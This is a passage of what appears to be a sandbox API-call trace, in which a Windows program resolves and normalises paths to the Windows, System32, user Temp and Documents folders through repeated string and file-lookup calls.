psz="windows", len=0x7 | out: pbstr=0x33e0834*="windows") returned 1 [0173.320] SysReAllocStringLen (in: pbstr=0x3433b80*=0x0, psz="system32", len=0x8 | out: pbstr=0x3433b80*="system32") returned 1 [0173.321] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0173.321] SysReAllocStringLen (in: pbstr=0x28fe58*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fe58*="c:\\") returned 1 [0173.321] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="windows", len=0x7 | out: pbstr=0x28fae8*="windows") returned 1 [0173.322] FindFirstFileW (in: lpFileName="c:\\windows" (normalized: "c:\\windows"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf9061f60, ftLastAccessTime.dwHighDateTime=0x1da9884, ftLastWriteTime.dwLowDateTime=0xf9061f60, ftLastWriteTime.dwHighDateTime=0x1da9884, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x10ea788 [0173.322] FindNextFileW (in: hFindFile=0x10ea788, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf9061f60, ftLastAccessTime.dwHighDateTime=0x1da9884, ftLastWriteTime.dwLowDateTime=0xf9061f60, ftLastWriteTime.dwHighDateTime=0x1da9884, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0173.322] GetLastError () returned 0x12 [0173.322] FindClose (in: hFindFile=0x10ea788 | out: hFindFile=0x10ea788) returned 1 [0173.323] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Windows", len=0xa | out: pbstr=0x28fadc*="c:\\Windows") returned 1 [0173.323] SysReAllocStringLen (in: pbstr=0x28fe58*="c:\\Windows", psz="c:\\Windows\\", len=0xb | out: pbstr=0x28fe58*="c:\\Windows\\") returned 1 [0173.323] SysReAllocStringLen (in: pbstr=0x28fae8*="windows", psz="system32", len=0x8 | out: pbstr=0x28fae8*="system32") returned 1 [0173.323] FindFirstFileW (in: lpFileName="c:\\Windows\\system32" (normalized: "c:\\windows\\system32"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x30822e60, ftLastAccessTime.dwHighDateTime=0x1d99d0a, ftLastWriteTime.dwLowDateTime=0x30822e60, ftLastWriteTime.dwHighDateTime=0x1d99d0a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System32", cAlternateFileName="")) returned 0x10ea788 [0173.323] FindNextFileW (in: hFindFile=0x10ea788, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x30822e60, ftLastAccessTime.dwHighDateTime=0x1d99d0a, ftLastWriteTime.dwLowDateTime=0x30822e60, ftLastWriteTime.dwHighDateTime=0x1d99d0a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System32", cAlternateFileName="")) returned 0 [0173.324] GetLastError () returned 0x12 [0173.324] FindClose (in: hFindFile=0x10ea788 | out: hFindFile=0x10ea788) returned 1 [0173.324] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Windows\\", psz="c:\\Windows\\System32", len=0x13 | out: pbstr=0x28fadc*="c:\\Windows\\System32") returned 1 [0173.324] SysReAllocStringLen (in: pbstr=0x28fe58*="c:\\Windows\\System32", psz="c:\\Windows\\System32\\", len=0x14 | out: pbstr=0x28fe58*="c:\\Windows\\System32\\") returned 1 [0173.325] VirtualFree (lpAddress=0x3434000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0173.326] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Windows\\System32\\", len=0x14 | out: pbstr=0x28fad8*="c:\\Windows\\System32\\") returned 1 [0173.326] SysReAllocStringLen (in: pbstr=0x28fe58*="c:\\Windows\\System32\\", psz="c:\\Windows\\System32", len=0x13 | out: pbstr=0x28fe58*="c:\\Windows\\System32") returned 1 [0173.327] SysReAllocStringLen (in: pbstr=0x28fe5c*=0x0, psz="c:\\Windows\\System32", len=0x13 | out: pbstr=0x28fe5c*="c:\\Windows\\System32") returned 1 [0173.327] SysReAllocStringLen (in: pbstr=0x3420058*=0x0, psz="c:\\Windows\\System32\\", len=0x14 | out: pbstr=0x3420058*="c:\\Windows\\System32\\") returned 1 [0173.327] SysReAllocStringLen (in: pbstr=0x28fe50*=0x0, psz="c:", len=0x2 | out: pbstr=0x28fe50*="c:") returned 1 [0173.327] SysReAllocStringLen (in: pbstr=0x342005c*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x342005c*="c:\\") returned 1 [0173.328] GetTempPathW (in: nBufferLength=0xfffe, lpBuffer=0x3423b40 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25 [0173.328] CharLowerBuffW (in: lpsz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", cchLength=0x25 | out: lpsz="c:\\users\\keecfm~1\\appdata\\local\\temp\\") returned 0x25 [0173.328] SysReAllocStringLen (in: pbstr=0x342009c*=0x0, psz="c:\\users\\keecfm~1\\appdata\\local\\temp\\", len=0x25 | out: pbstr=0x342009c*="c:\\users\\keecfm~1\\appdata\\local\\temp\\") returned 1 [0173.329] SysReAllocStringLen (in: pbstr=0x34200a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x34200a0*="c:") returned 1 [0173.329] SysReAllocStringLen (in: pbstr=0x33e0834*=0x0, psz="users", len=0x5 | out: pbstr=0x33e0834*="users") returned 1 [0173.330] SysReAllocStringLen (in: pbstr=0x34200d4*=0x0, psz="keecfm~1", len=0x8 | out: pbstr=0x34200d4*="keecfm~1") returned 1 [0173.330] SysReAllocStringLen (in: pbstr=0x34200e0*=0x0, psz="appdata", len=0x7 | out: pbstr=0x34200e0*="appdata") returned 1 [0173.331] SysReAllocStringLen (in: pbstr=0x34200ec*=0x0, psz="local", len=0x5 | out: pbstr=0x34200ec*="local") returned 1 [0173.331] SysReAllocStringLen (in: pbstr=0x34200f8*=0x0, psz="temp", len=0x4 | out: pbstr=0x34200f8*="temp") returned 1 [0173.337] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0173.337] SysReAllocStringLen (in: pbstr=0x28fe44*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fe44*="c:\\") returned 1 [0173.337] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="users", len=0x5 | out: pbstr=0x28fae8*="users") returned 1 [0173.337] FindFirstFileW (in: lpFileName="c:\\users" (normalized: "c:\\users"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x10ea788 [0173.337] FindNextFileW (in: hFindFile=0x10ea788, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0173.338] GetLastError () returned 0x12 [0173.338] FindClose (in: hFindFile=0x10ea788 | out: hFindFile=0x10ea788) returned 1 [0173.338] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x28fadc*="c:\\Users") returned 1 [0173.338] SysReAllocStringLen (in: pbstr=0x28fe44*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x28fe44*="c:\\Users\\") returned 1 [0173.338] SysReAllocStringLen (in: pbstr=0x28fae8*="users", psz="keecfm~1", len=0x8 | out: pbstr=0x28fae8*="keecfm~1") returned 1 [0173.339] FindFirstFileW (in: lpFileName="c:\\Users\\keecfm~1" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0x10ea788 [0173.339] FindNextFileW (in: hFindFile=0x10ea788, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0 [0173.339] GetLastError () returned 0x12 [0173.339] FindClose (in: hFindFile=0x10ea788 | out: hFindFile=0x10ea788) returned 1 [0173.340] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\", psz="c:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj") returned 1 [0173.340] SysReAllocStringLen (in: pbstr=0x28fe44*="c:\\Users\\kEecfMwgj", psz="c:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28fe44*="c:\\Users\\kEecfMwgj\\") returned 1 [0173.340] SysReAllocStringLen (in: pbstr=0x28fae8*="keecfm~1", psz="appdata", len=0x7 | out: pbstr=0x28fae8*="appdata") returned 1 [0173.340] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\appdata" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0x10ea788 [0173.340] FindNextFileW (in: hFindFile=0x10ea788, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0 [0173.341] GetLastError () returned 0x12 [0173.341] FindClose (in: hFindFile=0x10ea788 | out: hFindFile=0x10ea788) returned 1 [0173.341] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\", psz="c:\\Users\\kEecfMwgj\\AppData", len=0x1a | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData") returned 1 [0173.341] SysReAllocStringLen (in: pbstr=0x28fe44*="c:\\Users\\kEecfMwgj\\AppData", psz="c:\\Users\\kEecfMwgj\\AppData\\", len=0x1b | out: pbstr=0x28fe44*="c:\\Users\\kEecfMwgj\\AppData\\") returned 1 [0173.341] SysReAllocStringLen (in: pbstr=0x28fae8*="appdata", psz="local", len=0x5 | out: pbstr=0x28fae8*="local") returned 1 [0173.342] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\local" (normalized: "c:\\users\\keecfmwgj\\appdata\\local"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe31a0b60, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xe31a0b60, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0x10ea788 [0173.342] FindNextFileW (in: hFindFile=0x10ea788, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe31a0b60, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xe31a0b60, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0 [0173.342] GetLastError () returned 0x12 [0173.342] FindClose (in: hFindFile=0x10ea788 | out: hFindFile=0x10ea788) returned 1 [0173.343] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local", len=0x20 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local") returned 1 [0173.343] SysReAllocStringLen (in: pbstr=0x28fe44*="c:\\Users\\kEecfMwgj\\AppData\\Local", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\", len=0x21 | out: pbstr=0x28fe44*="c:\\Users\\kEecfMwgj\\AppData\\Local\\") returned 1 [0173.343] SysReAllocStringLen (in: pbstr=0x28fae8*="local", psz="temp", len=0x4 | out: pbstr=0x28fae8*="temp") returned 1 [0173.343] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\Local\\temp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf38c1580, ftLastAccessTime.dwHighDateTime=0x1da9884, ftLastWriteTime.dwLowDateTime=0xf38c1580, ftLastWriteTime.dwHighDateTime=0x1da9884, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0x10eeeb0 [0173.343] FindNextFileW (in: hFindFile=0x10eeeb0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf38c1580, ftLastAccessTime.dwHighDateTime=0x1da9884, ftLastWriteTime.dwLowDateTime=0xf38c1580, ftLastWriteTime.dwHighDateTime=0x1da9884, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0 [0173.344] GetLastError () returned 0x12 [0173.344] FindClose (in: hFindFile=0x10eeeb0 | out: hFindFile=0x10eeeb0) returned 1 [0173.344] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", len=0x25 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp") returned 1 [0173.344] SysReAllocStringLen (in: pbstr=0x28fe44*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", len=0x26 | out: pbstr=0x28fe44*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\") returned 1 [0173.346] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", len=0x26 | out: pbstr=0x28fad8*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\") returned 1 [0173.346] SysReAllocStringLen (in: pbstr=0x28fe44*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", len=0x25 | out: pbstr=0x28fe44*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp") returned 1 [0173.347] SysReAllocStringLen (in: pbstr=0x28fe48*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", len=0x25 | out: pbstr=0x28fe48*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp") returned 1 [0173.407] SysReAllocStringLen (in: pbstr=0x3420064*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", len=0x26 | out: pbstr=0x3420064*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\") returned 1 [0173.407] GetWindowsDirectoryW (in: lpBuffer=0x3423b40, uSize=0xfffe | out: lpBuffer="C:\\Windows") returned 0xa [0173.408] CharLowerBuffW (in: lpsz="C:\\Windows", cchLength=0xa | out: lpsz="c:\\windows") returned 0xa [0173.408] SysReAllocStringLen (in: pbstr=0x342009c*=0x0, psz="c:\\windows", len=0xa | out: pbstr=0x342009c*="c:\\windows") returned 1 [0173.408] SysReAllocStringLen (in: pbstr=0x34200a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x34200a0*="c:") returned 1 [0173.409] SysReAllocStringLen (in: pbstr=0x33e0834*=0x0, psz="windows", len=0x7 | out: pbstr=0x33e0834*="windows") returned 1 [0173.409] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0173.409] SysReAllocStringLen (in: pbstr=0x28fe38*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fe38*="c:\\") returned 1 [0173.409] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="windows", len=0x7 | out: pbstr=0x28fae8*="windows") returned 1 [0173.409] FindFirstFileW (in: lpFileName="c:\\windows" (normalized: "c:\\windows"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf9061f60, ftLastAccessTime.dwHighDateTime=0x1da9884, ftLastWriteTime.dwLowDateTime=0xf9061f60, ftLastWriteTime.dwHighDateTime=0x1da9884, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x10ef150 [0173.414] FindNextFileW (in: hFindFile=0x10ef150, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf9061f60, ftLastAccessTime.dwHighDateTime=0x1da9884, ftLastWriteTime.dwLowDateTime=0xf9061f60, ftLastWriteTime.dwHighDateTime=0x1da9884, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0173.414] GetLastError () returned 0x12 [0173.414] FindClose (in: hFindFile=0x10ef150 | out: hFindFile=0x10ef150) returned 1 [0173.414] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Windows", len=0xa | out: pbstr=0x28fadc*="c:\\Windows") returned 1 [0173.415] SysReAllocStringLen (in: pbstr=0x28fe38*="c:\\Windows", psz="c:\\Windows\\", len=0xb | out: pbstr=0x28fe38*="c:\\Windows\\") returned 1 [0173.415] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Windows\\", len=0xb | out: pbstr=0x28fad8*="c:\\Windows\\") returned 1 [0173.415] SysReAllocStringLen (in: pbstr=0x28fe38*="c:\\Windows\\", psz="c:\\Windows", len=0xa | out: pbstr=0x28fe38*="c:\\Windows") returned 1 [0173.416] SysReAllocStringLen (in: pbstr=0x28fe3c*=0x0, psz="c:\\Windows", len=0xa | out: pbstr=0x28fe3c*="c:\\Windows") returned 1 [0173.416] SysReAllocStringLen (in: pbstr=0x3420054*=0x0, psz="c:\\Windows\\", len=0xb | out: pbstr=0x3420054*="c:\\Windows\\") returned 1 [0173.416] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3423b40 | out: pszPath="C:\\Users\\kEecfMwgj\\Documents") returned 0x0 [0173.417] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\Documents", cchLength=0x1c | out: lpsz="c:\\users\\keecfmwgj\\documents") returned 0x1c [0173.417] SysReAllocStringLen (in: pbstr=0x342009c*=0x0, psz="c:\\users\\keecfmwgj\\documents", len=0x1c | out: pbstr=0x342009c*="c:\\users\\keecfmwgj\\documents") returned 1 [0173.417] SysReAllocStringLen (in: pbstr=0x34200a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x34200a0*="c:") returned 1 [0173.418] SysReAllocStringLen (in: pbstr=0x33e0834*=0x0, psz="users", len=0x5 | out: pbstr=0x33e0834*="users") returned 1 [0173.418] SysReAllocStringLen (in: pbstr=0x34200d4*=0x0, psz="keecfmwgj", len=0x9 | out: pbstr=0x34200d4*="keecfmwgj") returned 1 [0173.419] SysReAllocStringLen (in: pbstr=0x34200e0*=0x0, psz="documents", len=0x9 | out: pbstr=0x34200e0*="documents") returned 1 [0173.419] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0173.419] SysReAllocStringLen (in: pbstr=0x28fe2c*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fe2c*="c:\\") returned 1 [0173.419] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="users", len=0x5 | out: pbstr=0x28fae8*="users") returned 1 [0173.420] FindFirstFileW (in: lpFileName="c:\\users" (normalized: "c:\\users"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x10ef150 [0173.420] FindNextFileW (in: hFindFile=0x10ef150, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0173.420] GetLastError () returned 0x12 [0173.420] FindClose (in: hFindFile=0x10ef150 | out: hFindFile=0x10ef150) returned 1 [0173.420] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x28fadc*="c:\\Users") returned 1 [0173.421] SysReAllocStringLen (in: pbstr=0x28fe2c*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x28fe2c*="c:\\Users\\") returned 1 [0173.421] SysReAllocStringLen (in: pbstr=0x28fae8*="users", psz="keecfmwgj", len=0x9 | out: pbstr=0x28fae8*="keecfmwgj") returned 1 [0173.421] FindFirstFileW (in: lpFileName="c:\\Users\\keecfmwgj" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0x10ef150 [0173.421] FindNextFileW (in: hFindFile=0x10ef150, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0 [0173.421] GetLastError () returned 0x12 [0173.421] FindClose (in: hFindFile=0x10ef150 | out: hFindFile=0x10ef150) returned 1 [0173.422] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\", psz="c:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj") returned 1 [0173.422] SysReAllocStringLen (in: pbstr=0x28fe2c*="c:\\Users\\kEecfMwgj", psz="c:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28fe2c*="c:\\Users\\kEecfMwgj\\") returned 1 [0173.422] SysReAllocStringLen (in: pbstr=0x28fae8*="keecfmwgj", psz="documents", len=0x9 | out: pbstr=0x28fae8*="documents") returned 1 [0173.422] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\documents" (normalized: "c:\\users\\keecfmwgj\\documents"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xc7a8ee20, ftLastAccessTime.dwHighDateTime=0x1da4ad7, ftLastWriteTime.dwLowDateTime=0xc7a8ee20, ftLastWriteTime.dwHighDateTime=0x1da4ad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x10ef150 [0173.423] FindNextFileW (in: hFindFile=0x10ef150, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xc7a8ee20, ftLastAccessTime.dwHighDateTime=0x1da4ad7, ftLastWriteTime.dwLowDateTime=0xc7a8ee20, ftLastWriteTime.dwHighDateTime=0x1da4ad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0 [0173.423] GetLastError () returned 0x12 [0173.423] FindClose (in: hFindFile=0x10ef150 | out: hFindFile=0x10ef150) returned 1 [0173.423] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\", psz="c:\\Users\\kEecfMwgj\\Documents", len=0x1c | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\Documents") returned 1 [0173.423] SysReAllocStringLen (in: pbstr=0x28fe2c*="c:\\Users\\kEecfMwgj\\Documents", psz="c:\\Users\\kEecfMwgj\\Documents\\", len=0x1d | out: 